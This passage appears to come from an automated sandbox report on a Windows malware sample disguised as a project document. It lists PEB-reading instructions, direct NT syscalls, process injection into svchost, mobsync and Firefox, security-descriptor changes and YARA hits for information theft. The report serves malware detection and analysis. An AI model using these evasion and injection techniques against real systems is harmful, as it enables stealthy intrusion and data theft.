                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]1_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]1_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]1_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_008180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EA124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 1260
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread APC queued: target process: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3003008
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_008187B1 LogonUserW
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00824C27 mouse_event
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00817CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0081874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: YH-3-12-2024-GDL Units - Projects.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: YH-3-12-2024-GDL Units - Projects.exe, zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007E862B cpuid
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00801E06 GetUserNameW
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668432399.000000000108A000.00000004.00000020.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668419174.000000000107A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
